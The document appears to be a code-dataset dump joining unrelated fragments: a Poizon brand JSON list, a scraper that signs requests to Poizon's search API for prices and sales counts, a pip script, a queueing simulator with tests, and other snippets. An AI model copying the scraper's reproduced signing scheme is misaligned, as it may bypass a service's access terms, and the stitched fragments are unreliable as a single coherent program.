DECAY","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21218byte_dc1d505013e356a3479ad5295b6f1e75_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10290,"brandName":"FOREO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte20670byte_924d6ad6b63fda5c7dae0c77b6e55a3f_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10035,"brandName":"Dyson","type":0,"logoUrl":"https://du.hupucdn.com/news_byte28101byte_18fa7633c4e27f221c840813d784080f_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10291,"brandName":"Christian Louboutin","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24594byte_d45524f35597ed91bbd7544f9e652172_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10293,"brandName":"xVESSEL","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23132byte_cc28fa998fb6243eb71054f6c2135db9_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10044,"brandName":"TISSOT","type":0,"logoUrl":"https://du.hupucdn.com/news_byte31626byte_d4191837d926ec7bbd1e29c5fe46e595_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10300,"brandName":"PRIME 1 STUDIO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21836byte_44d1b5dc422073743a3c11647a8409a3_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10047,"brandName":"MCM","type":0,"logoUrl":"https://du.hupucdn.com/news_byte50051byte_3ed4a130ff4dc02151428c3e50978942_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10310,"brandName":"acme de la vie","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22262byte_a8a932aaedbab86b34249828b7ed32f8_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10311,"brandName":"BE@RBRICK","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23466byte_2e8da4a1f054a8e4682594a45612814e_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10065,"brandName":"Timberland","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25895byte_88b2058d896df08f73cd94a47d2310f2_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":1000018,"brandName":"RAF SIMONS","type":0,"logoUrl":"https://du.hupucdn.com/FkYorY5yQT4Q4E66tjPrzETZ7R-p"},"seriesList":[]},{"brand":{"goodsBrandId":10068,"brandName":"PANERAI","type":0,"logoUrl":"https://du.hupucdn.com/news_byte32912byte_36220760228f319bb75f52330c7e4b3e_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":1000020,"brandName":"正负零","type":0,"logoUrl":"https://du.hupucdn.com/FsrWiDmNZYaV1MjkRu0KMGU065zO"},"seriesList":[]},{"brand":{"goodsBrandId":10069,"brandName":"MIDO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte26922byte_be1c2be794cb6d454620f4692647e268_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10070,"brandName":"Dupont","type":0,"logoUrl":"https://du.hupucdn.com/news_byte28213byte_3d762e61d0d0ab8dec7d7dd92fe1dc99_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10071,"brandName":"kindle","type":0,"logoUrl":"https://du.hupucdn.com/news_byte27862byte_be5d55c9c358e569b89fbf8e12fc20a4_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10331,"brandName":"WHY PLAY","type":0,"logoUrl":"https://du.hupucdn.com/news_byte28380byte_363531321a5e823c56cc2f933f3be497_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10078,"brandName":"Logitech","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21472byte_ce700f9b3ca84b7a4a5f308f82bae04e_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10341,"brandName":"anello","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25573byte_8080b45548c4b17bc976f8797ff158d5_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":1000045,"brandName":"DMCkal","type":0,"logoUrl":"https://du.hupucdn.com/FtcBWuRAZXH8rxoRoJSQDhQID6sT"},"seriesList":[]},{"brand":{"goodsBrandId":10350,"brandName":"A-COLD-WALL*","type":0,"logoUrl":"https://du.hupucdn.com/news_byte17623byte_ebcbe70f089dabe23e93588dc6ac66a3_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10354,"brandName":"CONKLAB","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21404byte_7fb50713eb0f986354735b304d5be896_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10101,"brandName":"GENANX/闪电","type":0,"logoUrl":"https://du.hupucdn.com/news_byte33425byte_c27fb3124848c48aee19c85441352048_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10358,"brandName":"FOOT INDUSTRY","type":0,"logoUrl":"https://du.hupucdn.com/news_byte20338byte_4e3b752398bf7ff9e16d9fe37e4ecee9_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10360,"brandName":"BONELESS","type":0,"logoUrl":"https://du.hupucdn.com/news_byte17690byte_8c346bdce381e0cf63c76f187a4fe042_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10361,"brandName":"umamiism","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22545byte_34df2f448a017f7fdb3e570606c241b9_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10362,"brandName":"华人青年","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22601byte_f52dc5ab9f4452f97babc47821d24021_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10363,"brandName":"FUNKMASTERS","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21027byte_1576a0f677e9cacd8762be6db99d4c78_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":1000061,"brandName":"GUESS","type":0,"logoUrl":"https://du.hupucdn.com/Fi6tDRWTi5rnQiW-ZB5BB-FbPoZN"},"seriesList":[]},{"brand":{"goodsBrandId":1000062,"brandName":"Needles","type":0,"logoUrl":"https://du.hupucdn.com/FiwdfFP76yqpag1r50r1qVG-TXad"},"seriesList":[]},{"brand":{"goodsBrandId":10368,"brandName":"Subtle","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21987byte_4b242f882bf5df63b2da5eae632fa29c_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10116,"brandName":"EMPORIO ARMANI","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22342byte_7060a8a9b7c6b335143673f5417a1944_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10124,"brandName":"AMONSTER","type":0,"logoUrl":"https://du.hupucdn.com/FjZYBGDKtsc_9n8ftq28XsMRxZxB"},"seriesList":[]},{"brand":{"goodsBrandId":10381,"brandName":"PCMY","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21692byte_205236932bf037dab9965dd2be87085e_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10127,"brandName":"Rothco","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24098byte_12c50dcd1c1044fa4a6335bedd98e7d4_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10131,"brandName":"THE WIZ","type":0,"logoUrl":"https://du.hupucdn.com/news_byte6823byte_6a92589a3c42dcb6a1f3e849966daf53_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10388,"brandName":"TSMLXLT","type":0,"logoUrl":"https://du.hupucdn.com/news_byte20983byte_d18f9145f160a5dd3b5d0ca45acec510_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10390,"brandName":"TRICKCOO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25337byte_823a55d69768b65e728f896971a0185d_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10391,"brandName":"NOCAO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22420byte_91b1ed0e11d4948a817f5ae35a0bfd99_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10136,"brandName":"PROS BY CH","type":0,"logoUrl":"https://du.hupucdn.com/news_byte6186byte_323eba7633b20d61d566dbc0bdb83f13_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10137,"brandName":"OXY","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24524byte_535ab7db658c3f1c8e00a821e5587585_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10394,"brandName":"FLOAT","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25774byte_07be4b895302ee06cbd9ad53aa017ed5_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10143,"brandName":"Suicoke","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22613byte_16cd0ea92dde2aea19b76b46491814bb_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10146,"brandName":"GARMIN","type":0,"logoUrl":"https://du.hupucdn.com/news_byte20845byte_5af278c31aad1b5e0982544840c2df96_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10151,"brandName":"BANPRESTO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte56132byte_ee71a1bac952dac4cd3f59b4c6673203_w800h800.jpg"},"seriesList":[]},{"brand":{"goodsBrandId":10153,"brandName":"Harman/Kardon","type":0,"logoUrl":"https://du.hupucdn.com/news_byte17446byte_134385ee63bf9d12cd7f98e27344310e_w150h150.jpg"},"seriesList":[]},{"brand":{"goodsBrandId":10413,"brandName":"OSCill","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23787byte_88a0a8c1b72cd8693957af2a53b89bd5_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10414,"brandName":"LIFEGOESON","type":0,"logoUrl":"https://du.hupucdn.com/FgHxeSwXg9SKBtRNrNNKjn-O8yxf"},"seriesList":[]},{"brand":{"goodsBrandId":10161,"brandName":"PSO Brand","type":0,"logoUrl":"https://du.hupucdn.com/news_byte47498byte_0bb2a47154dfa0fc914e98cfeae6c407_w1000h1000.jpg"},"seriesList":[]},{"brand":{"goodsBrandId":10167,"brandName":"EVISU","type":0,"logoUrl":"https://du.hupucdn.com/news_byte8745byte_0ba5f52e059d3e91803a05843c2b22e2_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10423,"brandName":"Maison Margiela","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22857byte_d8df7145e944cd7b203d3f5520b06c43_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10168,"brandName":"INXX","type":0,"logoUrl":"https://du.hupucdn.com/news_byte20442byte_4c50ce6dca7408dec92df78b72106e46_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10169,"brandName":"B&O","type":0,"logoUrl":"https://du.hupucdn.com/news_byte36636byte_b32fd6036ba60c4f868b197ada8b8c6f_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10425,"brandName":"Charlie Luciano","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21051byte_28faf07c5d5a078a6fc18357413ce7c3_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10170,"brandName":"CITIZEN","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21252byte_1158debba23c31ccfed657aa8ce762bd_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10171,"brandName":"LOFREE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22408byte_1af23b04a9bc352bfff21edb63514d39_w150h150.jpg"},"seriesList":[]},{"brand":{"goodsBrandId":10429,"brandName":"Arcteryx","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24934byte_5ebce6f644ee8ebdbc89f04a068fc1af_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10174,"brandName":"DAMTOYS","type":0,"logoUrl":"https://du.hupucdn.com/news_byte31687byte_84591020e1a16ce89318585a5d84e9fc_w150h150.jpg"},"seriesList":[]},{"brand":{"goodsBrandId":10175,"brandName":"POP MART","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24981byte_909c5a578874dac97c6d3796be69cdf3_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10179,"brandName":"野兽王国","type":0,"logoUrl":"https://du.hupucdn.com/news_byte36849byte_5af274d0628f77ca06994e30ed50d5c4_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10183,"brandName":"ALIENWARE/外星人","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25149byte_458a868f82f2ac201e5d2f56fc087d60_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10184,"brandName":"Herschel","type":0,"logoUrl":"https://du.hupucdn.com/news_byte34213byte_403f7a96cd33f1cfdb12769a7e870f65_w824h752.png"},"seriesList":[]},{"brand":{"goodsBrandId":10187,"brandName":"科大讯飞","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25000byte_8351390b01275c1fcaa8f20a040b6dfe_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10443,"brandName":"chinism","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21910byte_d24daabd4b84bba6c37e22a42dd18602_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10188,"brandName":"韶音","type":0,"logoUrl":"https://du.hupucdn.com/news_byte6089byte_b5d736ec8a0c1269eceb94dcfa520c37_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10190,"brandName":"SAINT LAURENT","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21416byte_6836702d9d6f487e44b8922d8eaeb86b_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10193,"brandName":"SPALDING","type":0,"logoUrl":"https://du.hupucdn.com/news_byte27011byte_12f13f15a9a198939f3d9b847dbdb214_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10195,"brandName":"Levis","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23207byte_ad584d3079f341b83325f4974b99e342_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10196,"brandName":"SENNHEISER","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21466byte_f597724d3c9eb3294441c608cb59e1fe_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10197,"brandName":"CASETIFY","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23539byte_3a85a808033ed920a29cac5fad902b6f_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10199,"brandName":"JMGO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte26989byte_cdd8e059931aa405f55c5d2426862a6b_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10200,"brandName":"PHILIPS","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24239byte_5655ed4f287863630934c96aa823346a_w150h150.jpg"},"seriesList":[]},{"brand":{"goodsBrandId":10201,"brandName":"SEIKO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22717byte_6bfa41469825cfd6c70f5e3080d5de6a_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10202,"brandName":"GENANX","type":0,"logoUrl":"https://du.hupucdn.com/news_byte9514byte_77dee80e931dfd8b528f609c400951e4_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10204,"brandName":"TIANC","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21593byte_aa160ed7e50ca090d629490010346a9a_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10205,"brandName":"Drew House","type":0,"logoUrl":"https://du.hupucdn.com/news_byte30015byte_31ba151ba30e01ae6132ce9584b4e49a_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10206,"brandName":"小米/MI","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23786byte_d04434a4af3b56e20758cbeaed4f4531_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10207,"brandName":"CALVIN KLEIN","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24775byte_736593d1ee0995be050b1fbcec77bf46_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":2016,"brandName":"DanielWellington","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21711byte_f48145a65169f913b0139ff2e1811e78_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10211,"brandName":"飞智","type":0,"logoUrl":"https://du.hupucdn.com/news_byte26616byte_8001c14855f8528d7bccc31183bfaf75_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10213,"brandName":"TOM FORD","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21248byte_2994883ac1627497e75e9b99ba327c48_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10485,"brandName":"RickyisClown","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22583byte_98f823c8acb1459e6c72f5bdaf8a88b0_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10233,"brandName":"Dr.Martens","type":0,"logoUrl":"https://du.hupucdn.com/news_byte31892byte_8d31e2f10cc7fffe8d99545d757dfff6_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10238,"brandName":"APPortfolio","type":0,"logoUrl":"https://du.hupucdn.com/news_byte30968byte_19dd10185fc4b82037621b3708a613e4_w150h150.png"},"seriesList":[]}]},"status":200}
super(DuGet, self).__init__()
def sign(self, raw_sign_code_str):
# md5原始sign的字符串
m = hashlib.md5()
m.update(raw_sign_code_str.encode("utf8"))
return m.hexdigest()
def search_keywords(self, keywords, sortMode=1, sortType=1, page=0):
# 关键词搜索商品接口
sign = self.sign('limit20page{}showHot-1sortMode{}sortType{}title{}unionId19bc545a393a25177083d4a748807cc0'.format(page, sortMode, sortType, keywords))
url = 'https://app.poizon.com/api/v1/h5/search/fire/search/list'
params = {
'sign': sign,
'title': quote(keywords),
'page': page,
'sortType': sortType,
'sortMode': sortMode,
'limit': '20',
'showHot': '-1',
'unionId': ''
}
soldNum = -1
price = 0
others = []
try:
res_data = requests.get(url, headers=self.headers, params=params, timeout=5).json()
if res_data['data']['total'] == 1:
it = res_data['data']['productList'][0]
soldNum = it.get('soldNum', -1)
price = it.get('price', 0)
if price > 0:
price = price / 100
elif res_data['data']['total'] > 1 and res_data['data']['total'] < 5:
for it in res_data['data']['productList']:
others.append({"soldNum":it.get('soldNum'), "price":it.get('price'), "title":it.get('title')})
except Exception as e:
logger.error("{}:{} {} {}".format(self.__class__, url, keywords, e))
return soldNum, price, json.dumps(others)
def show(self):
# d = DuGet()
# res = d.search_keywords('fw9348', 1, 1)
# if res['data']['total'] == 1:
# data_info = res['data']['productList'][0]
# print("soldNum:{},price:{},minPrice:{},spuMinPrice:{},{},{}:{}".format(data_info.get('soldNum', '异常'), data_info.get('price', '异常'),
# data_info.get('minSalePrice', '异常'), data_info.get('spuMinSalePrice', '异常'),
# data_info.get('articleNumber', '异常'), data_info.get('title', '异常'), data_info.get('subTitle', '异常')))
pass
def run(self):
logger.info("start thread {}".format(self.__class__))
statistic_count = 0
while True:
if self.task_queue.empty():
time.sleep(1)
continue
items = self.task_queue.get()
db_id, good_id = items[0], items[1]
soldNum, price, others = self.search_keywords(good_id)
self.results_queue.put((db_id, soldNum, price, others))
statistic_count += 1
if statistic_count % 100 == 0:
logger.info("{} done {}, current {}:{}".format(self.__class__, statistic_count,
self.task_queue.qsize(), self.results_queue.qsize()))
time.sleep(random.uniform(0, self.sleep))
| [
"798990255@qq.com"
] | 798990255@qq.com |
86e5353a7974d04d870bbcee14783ed107db730b | 26d3a7f99d3b24d92d84a362cc9c2aacb79dce73 | /venv/Scripts/pip3.8-script.py | a2398637eb894be0dda9050d415e609f1da0c2a4 | [] | no_license | LadislavTebich/Test_LT | d0d7f18d9f8231574018e916a2a9a0a5dbf236f3 | 54cbd0d026759f75331994e250b5c4325e2db2df | refs/heads/master | 2022-12-04T06:56:50.444142 | 2020-08-19T12:57:36 | 2020-08-19T12:57:36 | 288,732,294 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | #!C:\Users\tebiclad\PycharmProjects\novy\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.8'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.8')()
)
| [
"la.te@post.cz"
] | la.te@post.cz |
7bbbb1ef33734dd3fa84fcaa6ef4c6c904a371fa | 85171ce2cbf92c8d2d6893662a63ef0406e4c943 | /8번.py | 48f0aaefcc4860c12fb828caa9a4c13097646e3e | [] | no_license | kdg1969/dogyun981029 | c6ab80d30b2948194e3fee2aa3c8f2c9f9ea8f51 | 22d09200bf2566fc8e2ef3986601001e2237e48f | refs/heads/master | 2020-03-17T08:59:30.829165 | 2018-05-15T14:43:03 | 2018-05-15T14:43:03 | 133,457,522 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 75 | py | import time
for i in range(1,6):
print(i, end =' ')
time.sleep(1)
| [
"39289393+kdg1969@users.noreply.github.com"
] | 39289393+kdg1969@users.noreply.github.com |
e26dd02fe5d3ca61446aeb44694672a6852d2685 | a38eae05908efc50667b225d470dc28c8057abde | /Examples/put_pdf_request_tiff.py | ce8af07eee102d4b02c260fdae51edb4dc62138f | [
"MIT",
"Python-2.0"
] | permissive | aspose-pdf-cloud/aspose-pdf-cloud-python | 9fcceff7ee0df1d4594d4e508212a20059034ee5 | f462bf34d587232b7f0eea664b2725c9fa644c6c | refs/heads/master | 2023-09-03T12:57:11.864388 | 2023-08-24T12:46:37 | 2023-08-24T12:46:37 | 127,921,519 | 9 | 5 | MIT | 2023-08-24T12:46:38 | 2018-04-03T14:32:18 | Python | UTF-8 | Python | false | false | 254 | py | from configuration import *
file_name = '4pages.pdf'
result_file_name = "result.tiff"
opts = {
"file": test_data_path + file_name
}
response = pdf_api.put_pdf_in_request_to_tiff(
temp_folder + '/' + result_file_name, **opts)
pprint(response)
| [
"mateen.sajid@systemsltd.com"
] | mateen.sajid@systemsltd.com |
13c1a1145d7bfb16e18555515b82e854b1115287 | ce5b0928e1044c6f05aeff18f19178fb8838bab7 | /QueueingSystems/mg1_model.py | 0e5f4029d6372e84dddce588da1f465f5a1139dd | [] | no_license | eth-cscs/abcpy-models | b79abc0778c17b2beabe3b30b899a02392060ed2 | be3c648b19ddf5770482216a9381db5bbcdb3d24 | refs/heads/master | 2022-03-12T20:43:57.973456 | 2022-02-22T17:00:27 | 2022-02-22T17:00:27 | 101,402,025 | 11 | 8 | null | 2021-09-10T15:06:22 | 2017-08-25T12:33:11 | Python | UTF-8 | Python | false | false | 4,206 | py | import unittest
import numpy as np
from abcpy.continuousmodels import ProbabilisticModel, Continuous, InputConnector
class MG1Queue(ProbabilisticModel, Continuous):
"""Simulates a M/G/1 queueing system with Uni[theta1, theta2] service times and Exp(theta3) interarrival times.
It returns the interdeparture time for the first number_steps steps, assuming the queue starts empty.
[1] Nelson, Barry. Foundations and methods of stochastic simulation: a first course. Springer Science & Business
Media, 2013.
"""
def __init__(self, parameters, number_steps=5, name='M/G/1'):
self.number_steps = number_steps
input_parameters = InputConnector.from_list(parameters)
super(MG1Queue, self).__init__(input_parameters, name)
def forward_simulate(self, input_values, num_forward_simulations, rng=np.random.RandomState()):
theta1 = input_values[0]
theta2 = input_values[1]
theta3 = input_values[2]
simulations = self.simulate_mg1_vectorized(theta1, theta2, theta3, rng, num_forward_simulations)
result = [None] * num_forward_simulations
for i in range(num_forward_simulations):
result[i] = simulations[:, i]
return result
def simulate_mg1_single(self, theta1, theta2, theta3, rng):
# use here Lindley equation (notation follows chapter 4.3 of [1]) .
Y = np.zeros(self.number_steps + 1)
X = np.zeros(self.number_steps + 1)
A = np.zeros(self.number_steps + 1)
inter_dep = np.zeros(self.number_steps + 1)
for i in range(1, self.number_steps + 1):
A[i] = rng.exponential(scale=1 / theta3) # scale is 1/rate
X[i] = rng.uniform(theta1, theta2)
Y[i] = np.max([0, Y[i - 1] + X[i - 1] - A[i]])
# compute the inter-departure times:
inter_dep[i] = A[i] + X[i] + Y[i] - Y[i - 1] - X[i - 1]
# print(Y)
return inter_dep[1:]
def simulate_mg1_vectorized(self, theta1, theta2, theta3, rng, num_forward_simulations=1):
# use here Lindley equation (notation follows chapter 4.3 of [1]) .
Y = np.zeros((self.number_steps + 1, num_forward_simulations))
X = np.zeros((self.number_steps + 1, num_forward_simulations))
A = np.zeros((self.number_steps + 1, num_forward_simulations))
inter_dep = np.zeros((self.number_steps + 1, num_forward_simulations))
for i in range(1, self.number_steps + 1):
A[i] = rng.exponential(scale=1 / theta3, size=num_forward_simulations) # scale is 1/rate
X[i] = rng.uniform(theta1, theta2, size=num_forward_simulations)
Y[i] = np.clip(Y[i - 1] + X[i - 1] - A[i], a_min=0, a_max=np.infty) # clip from below with 0
# compute the inter-departure times:
inter_dep[i] = A[i] + X[i] + Y[i] - Y[i - 1] - X[i - 1]
return inter_dep[1:]
def get_output_dimension(self):
return self.number_steps
def _check_input(self, input_values):
"""
"""
if len(input_values) != 3:
return False
if input_values[0] < 0 or input_values[1] <= 0 or input_values[2] <= 0 or input_values[0] > input_values[1]:
return False
return True
def _check_output(self, values):
return True
class MG1Tests(unittest.TestCase):
def setUp(self) -> None:
theta1 = 1
theta2 = 3
theta3 = 0.4
self.model = MG1Queue([theta1, theta2, theta3])
self.rng = np.random.RandomState(seed=42)
def test_check_input(self):
self.assertTrue(not self.model._check_input([1, 2, -1]))
self.assertTrue(not self.model._check_input([-1, 2, 1]))
self.assertTrue(not self.model._check_input([3, 2, 1]))
self.assertTrue(not self.model._check_input([1, 0, 1]))
def test_forward_sim(self):
out = self.model.forward_simulate([1, 3, 0.4], num_forward_simulations=1, rng=self.rng)
self.assertAlmostEqual(2.6245675830028423, np.mean(out[0]))
out = self.model.forward_simulate([1, 3, 0.4], num_forward_simulations=2, rng=self.rng)
self.assertAlmostEqual(2.1292085866241366, np.mean(out[0]))
| [
"lorenzo.pacchiardi@stats.ox.ac.uk"
] | lorenzo.pacchiardi@stats.ox.ac.uk |
afeca1f1cd07b23047db7c543d9706c25036ef44 | 0d43b36da35dc97239e665dedfa6f5dd6812986e | /examples/kure.py | da3070e7084e790b7b41eac23c4b3337d6021baf | [] | no_license | PaulCotney/tfpipe | 39be244b46a531fbac3a41cf606e957dde6e02e7 | 88008c80c48ccf91527311c7f7ac801c4b0dd0c3 | refs/heads/master | 2021-01-22T09:48:54.127534 | 2018-08-22T13:48:31 | 2018-08-22T13:48:31 | 63,611,894 | 0 | 0 | null | 2017-05-15T16:22:14 | 2016-07-18T14:54:04 | Python | UTF-8 | Python | false | false | 2,340 | py | #!/usr/bin/env python
"""Example pipeline using LSF on Kure.
"""
from os.path import basename as bname
from tfpipe.modules.galaxy import FastxTrimmer, FastqQualityFilter
from tfpipe.pipeline import WorkFlow
def main(args):
job_list = []
for input_file in args.files:
filename = bname(input_file)
trimmer = FastxTrimmer(name='%s_trim' % filename)
trimmer.add_argument('-Q', '33')
trimmer.add_argument('-l', args.num_bp)
trimmer.add_argument('-o',
pjoin(args.out_dir, ''.join(['t', filename])),
'output')
job_list.append(trimmer)
quality = FastqQualityFilter(name='%s_quality' % filename)
quality.add_argument('-Q', '33')
quality.add_argument('-i', trimmer.get_output_file(), 'input')
quality.add_argument('-o',
pjoin(args.out_dir,
''.join(['q', trimmer.get_output_file()])),
'output')
quality.add_argument('-q', args.quality)
quality.add_argument('-p', args.percent)
quality.add_dependencies(done=[trimmer,])
job_list.append(quality)
wf = WorkFlow(job_list)
wf.run() if args.run else wf.show()
if __name__ == "__main__":
from argparse import ArgumentParser
parser = ArgumentParser(prog='kure', usage='%(prog)s [options]')
parser.add_argument('--num-bp',
required=True,
help='Number of base pairs to keep.')
parser.add_argument('--quality',
required=True,
help='Quality value used in filtering.')
parser.add_argument('--percent',
required=True,
help='Percent value used in filtering.')
parser.add_argument('--out-dir',
required=True,
help='Output directory.')
parser.add_argument('files',
nargs='+',
help='Files to filter.')
parser.add_argument('--run',
action='store_true',
default=False,
help='Boolean: run or show pipeline - default: False.')
args = parser.parse_args()
main(args)
| [
"eklundke@gmail.com"
] | eklundke@gmail.com |
e3befb7b065b5be68585a6da785f873742bbffa3 | a6fa311aff9a99ad6a47e41fe34f3f12bb507007 | /reagent/training/__init__.py | 2cc9b73dd0d046b8b5115d9b7e1115535db99f34 | [
"BSD-3-Clause"
] | permissive | cts198859/ReAgent | 222e9dd4aeba455ad5faa9f6178a0e9793cb82fc | 20f3d333821bad364fd567cce97de51c44123484 | refs/heads/master | 2022-09-15T13:08:24.732208 | 2020-05-29T00:51:35 | 2020-05-29T00:54:45 | 267,776,326 | 0 | 0 | BSD-3-Clause | 2020-05-29T05:51:43 | 2020-05-29T05:51:43 | null | UTF-8 | Python | false | false | 987 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
from .c51_trainer import C51Trainer, C51TrainerParameters
from .cem_trainer import CEMTrainer
from .dqn_trainer import DQNTrainer, DQNTrainerParameters
from .parametric_dqn_trainer import ParametricDQNTrainer, ParametricDQNTrainerParameters
from .qrdqn_trainer import QRDQNTrainer, QRDQNTrainerParameters
from .rl_trainer_pytorch import RLTrainer
from .sac_trainer import SACTrainer, SACTrainerParameters
from .td3_trainer import TD3Trainer, TD3TrainingParameters
from .world_model.mdnrnn_trainer import MDNRNNTrainer
__all__ = [
"C51Trainer",
"C51TrainerParameters",
"CEMTrainer",
"RLTrainer",
"DQNTrainer",
"DQNTrainerParameters",
"MDNRNNTrainer",
"ParametricDQNTrainer",
"ParametricDQNTrainerParameters",
"QRDQNTrainer",
"QRDQNTrainerParameters",
"SACTrainer",
"SACTrainerParameters",
"TD3Trainer",
